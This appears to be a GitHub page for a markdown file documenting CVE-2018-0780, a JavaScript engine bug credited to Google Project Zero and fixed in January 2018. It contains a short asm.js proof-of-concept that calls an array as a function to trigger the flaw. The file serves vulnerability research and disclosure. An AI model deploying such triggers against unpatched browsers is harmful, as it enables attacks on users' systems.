Skip to content

Latest commit

 

History

History
30 lines (22 loc) · 559 Bytes

CVE-2018-0780.md

File metadata and controls

30 lines (22 loc) · 559 Bytes

CVE-2018-0780

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function Module() {
    'use asm';
    function f() {
        arr();
    }

    function g() {
    }

    var arr = [g];
    return f;
}

let f = Module();
f();

Reference